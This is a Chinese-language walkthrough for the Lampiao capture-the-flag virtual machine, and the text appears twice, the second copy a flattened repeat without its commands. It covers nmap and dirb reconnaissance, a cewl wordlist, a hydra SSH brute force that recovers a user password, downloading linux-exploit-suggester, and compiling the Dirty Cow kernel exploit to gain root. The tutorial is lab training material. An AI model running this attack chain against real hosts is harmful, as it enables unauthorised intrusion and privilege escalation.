No.2-红队渗透项目:Lampiao
字数 1213 2025-08-19 12:42:22

Lampiao靶机渗透测试详细教程

1. 靶机信息

  • 靶机名称:Lampiao
  • 难度等级:中等
  • 技术要点:信息收集、Web渗透、Drupal漏洞利用、SSH爆破、内核提权(Dirty Cow)
  • 测试环境:VMware虚拟机,Kali Linux作为攻击机

2. 信息收集阶段

2.1 网络扫描

使用nmap进行主机发现:

nmap -sP 192.168.111.0/24

发现目标IP:192.168.111.129

2.2 端口扫描与服务识别

全端口扫描:

nmap -p- 192.168.111.129

发现开放端口:

  • 22/tcp - SSH
  • 80/tcp - HTTP
  • 1898/tcp - HTTP

2.3 Web服务枚举

访问Web服务:

http://192.168.111.129:1898/

发现两个重要资源:

  1. 音频文件:http://192.168.111.129:1898/audio.m4a
    • 播放后获得用户名:tiago
  2. 二维码图片:http://192.168.111.129:1898/qrc.png
    • 扫描后无有效信息

2.4 目录爆破

使用dirb进行目录枚举:

dirb http://192.168.111.129:1898

发现重要文件:

  • robots.txt
  • CHANGELOG.txt

通过CHANGELOG.txt确认网站使用Drupal 7.54

3. Web渗透阶段

3.1 密码字典生成

使用cewl爬取网站生成密码字典:

cewl http://192.168.111.129:1898/?q=node/1 -w dayu.txt

3.2 SSH爆破

使用hydra进行SSH爆破:

hydra -l tiago -P dayu.txt 192.168.111.129 ssh

成功获取密码:Virgulino

3.3 SSH登录

使用获取的凭据登录:

ssh tiago@192.168.111.129

密码:Virgulino

4. 权限提升阶段

4.1 系统信息收集

登录后检查用户权限和系统信息:

id
uname -a

确认当前为低权限用户,需要提权

4.2 漏洞利用建议

下载linux-exploit-suggester脚本:

wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh

(注意:如果网络受限,可使用代理或本地HTTP服务器)

赋予执行权限并运行:

chmod +x les.sh
./les.sh

扫描结果显示存在Dirty Cow漏洞(CVE-2016-5195)

4.3 Dirty Cow漏洞利用

搜索并下载40847漏洞利用代码:

searchsploit dirty cow

或在线搜索"40847 exploit"

编译漏洞利用代码:

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil

执行后获得root权限,设置密码为"dirtyCowFun"

4.4 Root登录

使用新密码通过SSH登录root账户:

ssh root@192.168.111.129

密码:dirtyCowFun

5. 获取Flag

在root目录下找到flag:

9740616875908d91ddcdaa8aea3af366

6. 技术要点总结

  1. 信息收集:全面的端口扫描和目录枚举是关键
  2. 凭证获取:通过音频文件获取用户名,cewl生成字典,hydra爆破SSH
  3. 漏洞利用:识别Drupal版本,利用已知漏洞
  4. 权限提升:使用Dirty Cow漏洞进行内核提权
  5. 代理使用:在受限网络环境下使用代理或本地HTTP服务器传输文件

7. 防御建议

  1. 及时更新系统和应用补丁
  2. 使用强密码策略,避免密码重用
  3. 限制SSH访问,使用密钥认证
  4. 关闭不必要的服务和端口
  5. 定期进行安全审计和漏洞扫描

注意:本教程仅用于合法授权的渗透测试和安全研究,未经授权对他人系统进行测试是违法行为。

Lampiao靶机渗透测试详细教程 1. 靶机信息 靶机名称:Lampiao 难度等级:中等 技术要点:信息收集、Web渗透、Drupal漏洞利用、SSH爆破、内核提权(Dirty Cow) 测试环境:VMware虚拟机,Kali Linux作为攻击机 2. 信息收集阶段 2.1 网络扫描 使用nmap进行主机发现: 发现目标IP:192.168.111.129 2.2 端口扫描与服务识别 全端口扫描: 发现开放端口: 22/tcp - SSH 80/tcp - HTTP 1898/tcp - HTTP 2.3 Web服务枚举 访问Web服务: 发现两个重要资源: 音频文件: http://192.168.111.129:1898/audio.m4a 播放后获得用户名:tiago 二维码图片: http://192.168.111.129:1898/qrc.png 扫描后无有效信息 2.4 目录爆破 使用dirb进行目录枚举: 发现重要文件: robots.txt CHANGELOG.txt 通过CHANGELOG.txt确认网站使用Drupal 7.54 3. Web渗透阶段 3.1 密码字典生成 使用cewl爬取网站生成密码字典: 3.2 SSH爆破 使用hydra进行SSH爆破: 成功获取密码:Virgulino 3.3 SSH登录 使用获取的凭据登录: 密码:Virgulino 4. 权限提升阶段 4.1 系统信息收集 登录后检查用户权限和系统信息: 确认当前为低权限用户,需要提权 4.2 漏洞利用建议 下载linux-exploit-suggester脚本: (注意:如果网络受限,可使用代理或本地HTTP服务器) 赋予执行权限并运行: 扫描结果显示存在Dirty Cow漏洞(CVE-2016-5195) 4.3 Dirty Cow漏洞利用 搜索并下载40847漏洞利用代码: 或在线搜索"40847 exploit" 编译漏洞利用代码: 执行后获得root权限,设置密码为"dirtyCowFun" 4.4 Root登录 使用新密码通过SSH登录root账户: 密码:dirtyCowFun 5. 获取Flag 在root目录下找到flag: 6. 技术要点总结 信息收集 :全面的端口扫描和目录枚举是关键 凭证获取 :通过音频文件获取用户名,cewl生成字典,hydra爆破SSH 漏洞利用 :识别Drupal版本,利用已知漏洞 权限提升 :使用Dirty Cow漏洞进行内核提权 代理使用 :在受限网络环境下使用代理或本地HTTP服务器传输文件 7. 防御建议 及时更新系统和应用补丁 使用强密码策略,避免密码重用 限制SSH访问,使用密钥认证 关闭不必要的服务和端口 定期进行安全审计和漏洞扫描 注意:本教程仅用于合法授权的渗透测试和安全研究,未经授权对他人系统进行测试是违法行为。